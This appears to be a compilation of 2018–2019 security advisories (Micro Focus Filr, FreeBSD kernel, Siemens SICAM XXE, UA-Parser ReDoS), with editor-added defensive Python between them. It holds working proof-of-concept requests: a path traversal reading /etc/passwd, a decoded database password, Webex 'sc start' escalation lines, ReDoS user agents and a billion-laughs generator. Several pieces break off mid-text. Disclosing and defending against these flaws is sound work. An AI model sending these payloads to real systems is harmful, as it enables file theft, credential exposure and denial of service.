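    {"user": "NT AUTHORITY\\SYSTEM",
     "cmdline": 'sc start webexservice WebexService 1 989898 "C:\\Program Files (x86)\\Webex\\Plugins"'},
    {"user": "CORP\\bob", "cmdline": "sc query webexservice"},
    {"user": "CORP\\alice",
     "cmdline": "C:\\Windows\\System32\\sc.exe start WebexService WebexService 1 989898 C:\\ProgramData\\x"},
    {"user": "CORP\\alice", "cmdline": "sc start spooler"},
]

if __name__ == "__main__":
    for user, path in scan(SAMPLE_EVENTS):
        print("suspicious WebexService start by %s with folder %s" % (user, path))
```

The rule keys on the service name rather than the literal `989898` argument, so variations of the trigger are still caught; the cost is that administrators legitimately pointing the updater at a non-standard folder will need an allow-list entry.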
[SAUTH-2019-0001] - Micro Focus Filr Multiple Vulnerabilities
SecureAuth - SecureAuth Labs Advisory
http://www.secureauth.com/

Micro Focus Filr Multiple Vulnerabilities

1. *Advisory Information*

Title: Micro Focus Filr Multiple Vulnerabilities
Advisory ID: SAUTH-2019-0001
Advisory URL: https://www.secureauth.com/labs/advisories/micro-focus-filr-multiple-vulnerabilities
Date published: 2019-02-20
Date of last update: 2019-02-20
Vendors contacted: Micro Focus
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Path traversal [CWE-22], Permissions, Privileges, and Access Control [CWE-264]
Impact: Security bypass, Information leak
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2019-3474, CVE-2019-3475

3. *Vulnerability Description*

Novell (now part of Micro Focus [1]) website states that:

Micro Focus Filr [2] provides file access and sharing, and lets users access their home directories and network folders from desktops, mobile devices, and the Web. Users can also synchronize their files to their PC or Mac. Changes that they make to downloaded copies are kept in sync with the originals on their network file servers. And finally, users can also share files internally and externally, and those with the share can collaborate with each other by commenting on the files.

A vulnerability was found in the Micro Focus Filr Appliance which would allow an attacker with regular user access to read arbitrary files from the filesystem. Furthermore, a vulnerability in the famtd daemon could allow a local attacker to elevate privileges.

4. *Vulnerable Packages*

. Micro Focus Filr 3.4.0.217.
. Older versions are probably affected too, but they were not checked.

5. *Vendor Information, Solutions and Workarounds*

Micro Focus released Filr 3.0 Security Update 6, which addresses the reported issues:
https://download.novell.com/Download?buildid=nZUCSDkvpxk~

Also, Micro Focus published the following Security Notes:
. https://support.microfocus.com/kb/doc.php?id=7023726
. https://support.microfocus.com/kb/doc.php?id=7023727

6. *Credits*

These vulnerabilities were discovered and researched by Matias Choren from SecureAuth. The publication of this advisory was coordinated by Leandro Cuozzo from SecureAuth Advisories Team.

7. *Technical Description / Proof of Concept Code*

7.1. *Path Traversal* [CVE-2019-3474]

The 'filename' parameter of the '/ssf/f/viewFile' endpoint is vulnerable to path traversal. An authenticated, low-privileged user may be able to abuse this functionality in order to read arbitrary files on the filesystem.

Proof of Concept:

1. As an authenticated user, upload a sample PDF file in the 'My Files' section.

2. After the upload finishes, click on the small arrow next to the file -> 'View Details'.

3. The browser will issue a few requests to the web application, one of them being the one used to display the thumbnail of the file we have just uploaded. This request has the following structure:

/-
GET /ssf/s/viewFile?binderId=44=1=folderEntry=8a82ada06851d92d016852b727f26b1b=image=t154758084657912375035546628304890001.jpg
-/

4. If the 'viewType' parameter is set to 'image', as in this case, we can escape the current directory and include arbitrary files, as long as they are readable by the 'wwwrun' user (the user Apache Tomcat is running as). For example, we could read the '/etc/passwd' file:

/-
GET /ssf/s/viewFile?binderId=44=1=folderEntry=8a82ada06851d92d016852b727f26b1b=image=../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 10.2.45.32:8443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=803689DA9BA5DA9CBA2B7DD246A50531
Connection: close
-/

/-
HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-UA-Compatible: IE=Edge
X-Content-Type-Options: nosniff
Cache-Control: no-cache
Strict-Transport-Security: max-age=0
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Content-Type: image/jpeg
Date: Mon, 21 Jan 2019 14:53:37 GMT
Connection: close
Server: Filr
Content-Length: 1506

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
<...>
-/

5. Another interesting file to look for is '/vastorage/conf/vaconfig.zip'. This zip file contains a number of configuration files, including 'mysql-liquibase.properties' which, among other things, defines connection parameters such as the username and password (base64 encoded) for the MySQL database:

/-
referencePassword==?UTF-8?B?Zmlscg==?=
referenceUrl=jdbc:mysql://localhost:3306/filr?useUnicode=true&characterEncoding=UTF-8
url=jdbc:mysql://localhost:3306/filr?useUnicode=true&characterEncoding=UTF-8
password==?UTF-8?B?Zmlscg==?=
driver=com.mysql.jdbc.Driver
referenceUsername=filr
referenceDriver=com.mysql.jdbc.Driver
username=filr
-/

7.2. *Local Privilege Escalation* [CVE-2019-3475]

As per the description: 'novell-famtd provide CIFS & NCP file access sup
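Two checks a practitioner would want from section 7.1, as an added example by the editor rather than code from the advisory or from Filr: the file-name containment that the 'viewFile' handler lacks (resolve the user-supplied name under the thumbnail directory and refuse anything that escapes it), and a decoder for the '=?UTF-8?B?...?=' encoded words in which mysql-liquibase.properties stores the database password. The thumbnail directory path and the properties text are constructed for the demonstration; the properties values are the ones the advisory shows.

```python
"""Path containment for a user-supplied file name, and decoding of the
RFC 2047 encoded words used for credentials in mysql-liquibase.properties."""
import base64
import os
import quopri
import re

ENCODED_WORD = re.compile(r"=\?([^?]+)\?([BbQq])\?([^?]*)\?=")


def safe_resolve(base_dir: str, user_name: str) -> str:
    """Resolve user_name under base_dir; raise if the result escapes it.
    realpath() collapses '..' and follows symlinks before the check, so
    '../../../../etc/passwd' and absolute names are both rejected."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_name))
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        raise ValueError("file name escapes %s: %r" % (base_dir, user_name))
    return candidate


def is_contained(base_dir: str, user_name: str) -> bool:
    """Boolean form of safe_resolve for callers that only need a verdict."""
    try:
        safe_resolve(base_dir, user_name)
        return True
    except ValueError:
        return False


def decode_encoded_word(value: str) -> str:
    """Decode '=?charset?B?...?=' (base64) and '=?charset?Q?...?=' tokens."""
    def repl(m):
        charset, enc, payload = m.group(1), m.group(2).upper(), m.group(3)
        if enc == "B":
            raw = base64.b64decode(payload)
        else:
            raw = quopri.decodestring(payload.encode(), header=True)
        return raw.decode(charset)
    return ENCODED_WORD.sub(repl, value)


def parse_properties(text: str) -> dict:
    """Java .properties subset: key=value lines, '#'/'!' comments,
    encoded words in values decoded. Only the first '=' splits key/value,
    so 'password==?UTF-8?B?...?=' yields the encoded word as the value."""
    props = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "!")) or "=" not in line:
            continue
        key, _, value = line.partition("=")
        props[key.strip()] = decode_encoded_word(value.strip())
    return props


# Constructed from the excerpt in the advisory (same keys and values).
SAMPLE_PROPERTIES = """\
referencePassword==?UTF-8?B?Zmlscg==?=
referenceUrl=jdbc:mysql://localhost:3306/filr?useUnicode=true&characterEncoding=UTF-8
url=jdbc:mysql://localhost:3306/filr?useUnicode=true&characterEncoding=UTF-8
password==?UTF-8?B?Zmlscg==?=
driver=com.mysql.jdbc.Driver
referenceUsername=filr
referenceDriver=com.mysql.jdbc.Driver
username=filr
"""

if __name__ == "__main__":
    thumbs = "/srv/filr/thumbs"   # assumed thumbnail directory
    for name in ("t154758084657912375035546628304890001.jpg",
                 "../../../../../../../../../../../etc/passwd"):
        print("%-45s contained=%s" % (name[:45], is_contained(thumbs, name)))
    creds = parse_properties(SAMPLE_PROPERTIES)
    print("mysql credentials:", creds["username"], creds["password"])
```

The encoded word decodes to the literal string 'filr', which is why the advisory calls the value "base64 encoded" rather than encrypted; anyone who can read the zip has the database password.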
FreeBSD Security Advisory FreeBSD-SA-19:02.fd
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-19:02.fd                                         Security Advisory
                                                          The FreeBSD Project

Topic:          File description reference count leak

Category:       core
Module:         unix
Announced:      2019-02-05
Credits:        Peter Holm
Affects:        FreeBSD 12.0
Corrected:      2019-02-05 17:56:22 UTC (stable/12, 12.0-STABLE)
                2019-02-05 18:11:15 UTC (releng/12.0, 12.0-RELEASE-p3)
                2019-02-05 17:57:30 UTC (stable/11, 11.2-STABLE)
CVE Name:       CVE-2019-5596

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

UNIX-domain sockets are used for inter-process communication.  It is
possible to use UNIX-domain sockets to transfer rights, encoded as file
descriptors, to another process.

II.  Problem Description

FreeBSD 12.0 attempts to handle the case where the receiving process does
not provide a sufficiently large buffer for an incoming control message
containing rights.  In particular, to avoid leaking the corresponding
descriptors into the receiving process' descriptor table, the kernel
handles the truncation case by closing descriptors referenced by the
discarded message.  The code which performs this operation failed to
release a reference obtained on the file corresponding to a received
right.  This bug can be used to cause the reference counter to wrap
around and free the file structure.

III. Impact

A local user can exploit the bug to gain root privileges or escape from
a jail.

IV.  Workaround

No workaround is available.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date,
and reboot.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +30 "Rebooting for security update"

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 12.0]
# fetch https://security.FreeBSD.org/patches/SA-19:02/fd.patch
# fetch https://security.FreeBSD.org/patches/SA-19:02/fd.patch.asc
# gpg --verify fd.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/12/                                                        r343785
releng/12.0/                                                      r343790
stable/11/                                                        r343786
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a machine
with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5596>

The latest revision of this advisory is available at
<https://security.FreeBSD.org/advisories/FreeBSD-SA-19:02.fd.asc>
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlxZ1YFfFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cK7+w/+JeFIVM0QQC1R4wJFmT3bBaRumxGCx5PN5Ufe7ub/ztwsKQKJeps1aiS3
fzw3Ck1K7+joeG+cNwZNihmAyEa2Hgk+FDhQBX531yrwF1jQ2A2oKGfkhs5e02Ng
k16MV9pVlNP1zQ3wFVBjFCCvBuVJ0A8XTxALY7ivZlj2edgSH1eL4SaP1mrSD2Xu
pR2amN7WkAaIqvATK0VkWjYp6kUXtI8CBtdP3hpKz88rpYoZfWxupqtghnxgjIqt
iuTOhbemvYuBvB+ErbtU/6Z4ffoHt9Csrk2MM56/RZRwyHmtC4CFqtxClrUpOoa2
2OcEbR8cZyEardSES78UBjbTwlOTVd5F4o86Q1bKytHjI72ycB5yKZkyiHmdJCjs
EhlaDC/rnHxdYGvBuiLqFcNU5tJiGawZZwyozCQz67dGD89QzKQurKEWQ1YJvMsW
ZwwJRSHrllUyJQBdqV/R3Qoaz2koeE9633jtqHDdUYKCZAgeFdic/6u9r4Rx2Nj5
JpTZU01bwvxNZPf35WbI2L+JbygR40b3FYbZ3skBqZylp+EkPGPxGpHGAxdKWeOy
rzGBukIuWnLy9pmJ574oTZymw8Psvu2DJL3C
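The code path this advisory describes is the one taken when a receiver supplies an ancillary buffer too small for the SCM_RIGHTS message it is handed. The script below, an added example by the editor and not part of the FreeBSD advisory, drives exactly that path over a UNIX-domain socket pair so that an operator can see the truncation case (MSG_CTRUNC) and reason about what the kernel must clean up. It does not exercise the FreeBSD bug itself and sets nothing up beyond a socketpair and a few descriptors on /dev/null. The assertions in the usage note reflect Linux semantics, where the kernel installs as many descriptors as fit and flags truncation; the advisory text implies that FreeBSD discards the whole control message in this case, so the count received there may differ.

```python
"""Exercise the control-message truncation path the advisory describes:
send several descriptors over a UNIX-domain socket and receive them with an
ancillary buffer that is too small to hold them all."""
import array
import os
import socket


def send_rights(sock: socket.socket, fds: list) -> None:
    """Send fds as one SCM_RIGHTS control message with a one-byte payload."""
    rights = array.array("i", fds)
    sock.sendmsg([b"r"], [(socket.SOL_SOCKET, socket.SCM_RIGHTS, rights)])


def recv_rights(sock: socket.socket, max_fds: int):
    """Receive rights with room for at most max_fds descriptors.
    Returns (list of fds received, truncated flag)."""
    fds = array.array("i")
    # ancbufsize=0 means no control buffer at all: the message is dropped
    # by the kernel and MSG_CTRUNC is the only trace the receiver gets.
    ancbufsize = socket.CMSG_LEN(max_fds * fds.itemsize) if max_fds > 0 else 0
    _, ancdata, flags, _ = sock.recvmsg(1, ancbufsize)
    for level, ctype, data in ancdata:
        if level == socket.SOL_SOCKET and ctype == socket.SCM_RIGHTS:
            # A partially filled array may come back; drop any ragged tail.
            usable = len(data) - (len(data) % fds.itemsize)
            fds.frombytes(data[:usable])
    return list(fds), bool(flags & socket.MSG_CTRUNC)


def truncation_demo(n_send: int, max_recv: int):
    """Send n_send descriptors, receive with room for max_recv.
    Returns (number of descriptors received, truncated flag)."""
    a, b = socket.socketpair(socket.AF_UNIX, socket.SOCK_STREAM)
    to_send = [os.open(os.devnull, os.O_RDONLY) for _ in range(n_send)]
    try:
        send_rights(a, to_send)
        received, truncated = recv_rights(b, max_recv)
    finally:
        for fd in to_send:
            os.close(fd)
        a.close()
        b.close()
    # Every descriptor the kernel did install is our responsibility to close;
    # the ones that did not fit are closed by the kernel (the operation in
    # which the advisory's reference leak lived).
    for fd in received:
        os.close(fd)
    return len(received), truncated


if __name__ == "__main__":
    for n_send, max_recv in ((3, 3), (3, 1), (3, 0)):
        got, trunc = truncation_demo(n_send, max_recv)
        print("sent %d, room for %d: received %d, MSG_CTRUNC=%s"
              % (n_send, max_recv, got, trunc))
```

On Linux, `truncation_demo(3, 3)` returns `(3, False)`, `(3, 1)` returns one descriptor with the truncation flag set, and `(3, 0)` returns `(0, True)`. A receiver that ignores MSG_CTRUNC silently loses rights; a kernel that mishandles the discarded ones is what SA-19:02 patched.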
FreeBSD Security Advisory FreeBSD-SA-19:01.syscall
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-19:01.syscall                                    Security Advisory
                                                          The FreeBSD Project

Topic:          System call kernel data register leak

Category:       core
Module:         kernel
Announced:      2019-02-05
Credits:        Konstantin Belousov
Affects:        All supported versions of FreeBSD.
Corrected:      2019-02-05 17:52:06 UTC (stable/12, 12.0-STABLE)
                2019-02-05 18:05:05 UTC (releng/12.0, 12.0-RELEASE-p3)
                2019-02-05 17:54:02 UTC (stable/11, 11.2-STABLE)
                2019-02-05 18:07:45 UTC (releng/11.2, 11.2-RELEASE-p9)
CVE Name:       CVE-2019-5595

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

The FreeBSD/amd64 architecture defines the SYSCALL instruction for
syscalls, and uses register calling conventions for passing syscall
arguments and return values, in addition to the register usage imposed
by the SYSCALL and SYSRET instructions in long mode.  In particular, the
arguments are passed in the registers specified by the C ABI, and the
content of the registers specified as caller-save is undefined after
the return from a syscall.

II.  Problem Description

These caller-save registers are used by the kernel, and for some of them
(%r8, %r10, and for non-PTI configurations, %r9) the content is not
sanitized before return from syscalls, potentially leaking sensitive
information.

III. Impact

Typically the address of some kernel data structure used in the syscall
implementation is exposed.

IV.  Workaround

No workaround is available.

V.   Solution

Perform one of the following:

1) Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date,
and reboot.

2) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +10m "Rebooting for security update"

3) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

[FreeBSD 12.0]
# fetch https://security.FreeBSD.org/patches/SA-19:01/syscall.patch
# fetch https://security.FreeBSD.org/patches/SA-19:01/syscall.patch.asc
# gpg --verify syscall.patch.asc

[FreeBSD 11.2]
# fetch https://security.FreeBSD.org/patches/SA-19:01/syscall.11.2.patch
# fetch https://security.FreeBSD.org/patches/SA-19:01/syscall.11.2.patch.asc
# gpg --verify syscall.11.2.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/12/                                                        r343781
releng/12.0/                                                      r343788
stable/11/                                                        r343782
releng/11.2/                                                      r343789
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a machine
with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5595>

The latest revision of this advisory is available at
<https://security.FreeBSD.org/advisories/FreeBSD-SA-19:01.syscall.asc>
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlxZ1X9fFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cKPZBAAlwCVtNNIuq0s8FB9LjLaVJww1WWmbVJbhw1TJyBV2yRCkWwGDLag3dJ0
EH8HwpWeL41lppjFeL6OMDZ2+wUnuShv3pAUGwodSRXsKWsp+aWqMPcNJifkVPxs
DENrziUHnXkbOnbnP25eA12j0ztCz8FjKoDh+wrjuY4BL8jzBK4ZJtmYaubrFEcD
GDStnEcvCNYDK8tf0rUW2lpv4oStTex5gFpZALPjq0g28kHPuctYzoOXOf9/So1i
0kwdstsIdgydsDCHv5nXij7IDohNo+5KEJuee1cIptKftmxPLuonXyP0PiO3W
CVE-2018-13798 Siemens - SICAM A8000 Series Webinterface XXE DoS
#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:  SICAM A8000 Series
# Vendor:   Siemens
# CSNC ID:  CSNC-2019-002
# CVE ID:   CVE-2018-13798
# Subject:  SICAM Webinterface XXE DoS
# Risk:     Medium (CVSS 3.0 Base Score: 5.3)
# CVSS 3.0: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RL:O/RC:C
# Effect:   Unauthenticated remotely exploitable
# Authors:  Emanuel Duss
#           Nicolas Heiniger
# Date:     2019-01-14
#
#############################################################

Introduction
------------

The Siemens SICAM A8000 RTU (Remote Terminal Unit) series [1] is a modular device range for telecontrol and automation applications in all areas of energy supply. The device offers a web management interface for performing simple management tasks.

During a penetration test, Compass found a denial-of-service vulnerability in the Siemens SICAM web server. The web management interface is vulnerable to the billion laughs attack [2], a denial of service through nested XML entity expansion. Successful exploitation can be performed unauthenticated over the network.

Affected
--------

* SICAM A8000 CP-8000 < V14
* SICAM A8000 CP-802X < V14
* SICAM A8000 CP-8050 < V2.00

Technical Description
---------------------

When a login on the web management interface is performed, the following request is sent to the server:

POST /sicweb-ajax/auth HTTP/1.1
Host: 10.5.23.42
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.5.23.42
Content-Type: application/xml
Content-Length: 118
Connection: close

By modifying the XML message, it's possible to perform a billion laughs denial of service attack against the web management interface:

POST /sicweb-ajax/auth HTTP/1.1
Host: 10.5.23.42
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://10.5.23.42/
Content-Type: application/xml
Content-Length: 1679
Connection: close

]>

The XML parser on the device expands the nested entities. This consumes all available memory and the web management interface no longer responds. If the web management interface is refreshed in the browser, the following message appears:

The device is currently unreachable. Retrying to connect.

Other services on the device, like the one used by the ToolboxII for configuring the device or the IEC104 service, still work properly and are not affected by this attack. Only the web management interface remains unusable until the device is rebooted.

It's not possible to use XXE to read local or remote files using the SYSTEM directive.

Vulnerability Classification
----------------------------

* CVSS v3.0 Base Score: 5.3
* CVSS v3.0 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:P/RL:O/RC:C

Remediation
-----------

* SICAM A8000 CP-8000: Update to V14
* SICAM A8000 CP-802X: Update to V14
* SICAM A8000 CP-8050: Update to V2.00 or higher

Please see the Siemens advisory [3] for the download links.

As a workaround, it's also possible to restrict access to the web server on ports 80/tcp and 443/tcp using a firewall.

Acknowledgments
---------------

We thank Siemens for the coordinated disclosure.

Timeline
--------

2018-05-28: Vulnerability discovered by Emanuel Duss and Nicolas Heiniger
2018-05-28: Informed customer
2018-06-06: Initial vendor notification
2018-03-18: Vendor informed us that they will publish an advisory
2019-01-08: Siemens published advisory [3]
2019-01-11: Compass published advisory containing technical information

References
----------

[1] https://w3.siemens.com/smartgrid/global/en/products-systems-solutions/substation-automation/substation-automation/pages/sicam-a8000.aspx
[2] https://www.owasp.org/index.php/XML_Security_Cheat_Sheet#Billion_Laughs
[3] https://cert-portal.siemens.com/productcert/txt/ssa-579309.txt
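The defence against this class of bug is to decide, before the parser runs, that a document is not allowed to expand. The following is an added example by the editor, not code from Compass or from the SICAM firmware: it builds a payload of the shape OWASP documents in reference [2] (the advisory's actual request body is not reproduced on this page), then estimates the fully expanded size of a document from its internal DTD without expanding anything, so a front end can reject the request cheaply. The entity names and the example login document are constructed for the demonstration.

```python
"""Estimate how large an XML document becomes once its internal entities are
expanded, without expanding it, and refuse to parse when the factor is absurd."""
import re

ENTITY_DECL = re.compile(r'<!ENTITY\s+([^\s%]+)\s+"([^"]*)"\s*>')
ENTITY_REF = re.compile(r'&([^;&\s]+);')
PREDEFINED = {"lt", "gt", "amp", "apos", "quot"}   # expand to one character


def build_billion_laughs(depth: int, fanout: int) -> str:
    """Constructed payload in the OWASP 'billion laughs' shape: lol0 is the
    leaf, each lolN references lol(N-1) `fanout` times, the body uses lolN."""
    decls = ['<!ENTITY lol0 "lol">']
    for level in range(1, depth + 1):
        decls.append('<!ENTITY lol%d "%s">' % (level, "&lol%d;" % (level - 1) * fanout))
    return ('<?xml version="1.0"?>\n<!DOCTYPE lolz [\n' + "\n".join(decls)
            + "\n]>" + "\n<lolz>&lol%d;</lolz>" % depth)


def expanded_size(text, declared, memo, active=frozenset()):
    """Length of `text` after recursively substituting declared entities.
    Each entity is sized once (memo), so a 10^9 expansion costs 10 steps."""
    total, pos = 0, 0
    for m in ENTITY_REF.finditer(text):
        name = m.group(1)
        total += m.start() - pos
        pos = m.end()
        if name in declared:
            if name in active:
                raise ValueError("recursive entity " + name)
            if name not in memo:
                memo[name] = expanded_size(declared[name], declared, memo, active | {name})
            total += memo[name]
        elif name in PREDEFINED:
            total += 1
        else:
            total += m.end() - m.start()   # unknown reference stays as written
    return total + len(text) - pos


def expanded_body_size(xml: str) -> int:
    """Expanded size of the document body that follows the internal subset."""
    declared, body = {}, xml
    if "<!DOCTYPE" in xml:
        head, sep, rest = xml.partition("]>")
        if sep:
            declared, body = dict(ENTITY_DECL.findall(head)), rest
    return expanded_size(body, declared, {})


def amplification(xml: str) -> float:
    """Expanded body size relative to the bytes actually received."""
    return expanded_body_size(xml) / max(len(xml), 1)


def safe_to_parse(xml: str, max_factor: float = 10.0, allow_dtd: bool = False) -> bool:
    """Gate to run before handing the document to a real parser. The robust
    fix is to reject any DOCTYPE outright (allow_dtd=False); the amplification
    estimate is for services that must accept internal DTDs."""
    if "<!DOCTYPE" in xml and not allow_dtd:
        return False
    try:
        return amplification(xml) <= max_factor
    except ValueError:           # recursive entity: malformed and hostile
        return False


if __name__ == "__main__":
    payload = build_billion_laughs(9, 10)
    print("payload bytes: %d, expanded body bytes: %d"
          % (len(payload), expanded_body_size(payload)))
    print("safe_to_parse(payload):", safe_to_parse(payload, allow_dtd=True))
    login = '<?xml version="1.0"?><login><user>admin</user></login>'
    print("safe_to_parse(login):  ", safe_to_parse(login))
```

The estimator is a pre-filter, not a replacement for a hardened parser configuration: external entities, parameter entities and DTDs fetched over the network are out of its scope, which is why `allow_dtd` defaults to False. A device exposing a login endpoint has no reason to accept a DOCTYPE at all.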
X41 D-Sec GmbH Security Advisory X41-2018-009: ReDoS Vulnerability in UA-Parser
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

X41 D-SEC GmbH Security Advisory: X41-2018-009

ReDoS Vulnerability in UA-Parser
================================

Severity Rating: Medium
Confirmed Affected Versions: 2015-05-14 and newer, commit 6fd6c261274254bcbbacd77ef4b12534c7f9923d
Confirmed Patched Versions: v0.6.0 released 2018-12-14, commit 010ccdc7303546cd22b9da687c29f4a996990014
Vendor: UA-Parser Project
Vendor URL: https://github.com/ua-parser
Vector: HTTP request
Credit: X41 D-SEC GmbH, Luc Gommans
Status: Public
CVE: CVE-2018-20164
CVSSv3 Score: 5.3
CVSSv3 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2018-009-uaparser/

Summary and Impact
==================

The programming library UA-Parser uses regular expressions to identify user agent strings. The complexity of some of the regular expressions is such that an attacker can craft special patterns that keep the server busy for a long time. By sending many requests in short order, an attacker can exhaust the amount of processing power available. This causes the website to become unavailable for legitimate visitors.

In common setups, the user agent string is parsed whenever a page is visited. This means that anyone can abuse the bug, typically without authentication. There are no common circumstances which would prevent an attack from working reliably, i.e. an attacker can consistently and repeatedly exploit the issue until the site has become unreachable.

For more information on regular expression-based denial of service, see the OWASP page on ReDoS:
https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS

The UA-Parser project consists of a core repository, uap-core, and implementations in various languages. The regular expressions are defined in the core project and each implementation is automatically vulnerable.

Product Description
===================

When a user agent (such as a browser) connects to a website, it identifies itself with a 'user agent string'. This string helps the server determine relevant content, for example to serve the appropriate installer for visitors with different operating systems. The UA-Parser project collects regular expressions that extract the type of device and operating system from these strings. Implementations in different languages are automatically vulnerable, including the reference implementation in JavaScript: <https://github.com/ua-parser/uap-ref-impl>

Proof of Concept
================

There are multiple vulnerable regular expressions. They are collected in the file regex.yaml, for example on lines 911 and 4961. The regular expression on line 911 is as follows:

(x86_64|aarch64)\ (\d+)+\.(\d+)+\.(\d+)+.*Chrome.*(?:CitrixChromeApp)$

Any implementation using this library will hang for a few seconds (on commodity hardware) when sent the following HTTP request:

GET / HTTP/1.0
User-Agent: x86_64 1111111111111111111111111111

Normal user agent strings can be over a hundred bytes long: this string of 35 bytes is not an abnormal request. Adding one more byte makes the processing significantly longer. This particular regular expression was introduced in September 2018.

The regular expression on line 4961 was introduced in May 2015 and can be exploited as follows:

GET / HTTP/1.0
User-Agent: HbbTV/1.1.1CE-HTML/1.1;THOM;SW-Version/1;SW-Version/1;SW-Version/1;SW-Version/1;SW-Version/1;SW-Version/1;SW-Version/1;SW-Version/1;SW-Version/1;SW-Version/1;LF

Each additional repetition of SW-Version/1; multiplies the processing time by roughly a factor of 6.2. Where eleven repetitions take about seven seconds, fourteen repetitions already occupy a server for half an hour.

Workarounds
===========

Limiting the length of the user agent string is sometimes suggested, and a few hundred kilobytes of input would slow down most regular expressions, but as demonstrated the input does not have to be particularly long to exploit this issue, so a length limit is not a solution by itself. The root cause is the regular expressions themselves, which should be limited in complexity. This involves manual work and there is no solution that can be applied to all regular expressions in the project. To aid in identifying problematic regular expressions, one may use projects such as <https://github.com/jagracey/RegEx-DoS>.

Timeline
========

2018-11-26 Issue found.
2018-11-29 Permission from customer to disclose to upstream.
2018-11-29 Requested secure channel from vendor for communication.
2018-12-04 Disclosed to vendor.
2018-12-14 Patch released by vendor, CVE number requested.
2018-12-15 CVE-2018-20164 assigned.
2019-01-10 Advisory released.

About X41 D-SEC GmbH
====================

X41 is an expert provider for application security services. Having extensive industry experience and expertise in the area of information security, a strong core security team of world class security experts enables X41 to perform premium security services. Fields of expertise in the area of applicat
FreeBSD Security Advisory FreeBSD-SA-18:15.bootpd
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
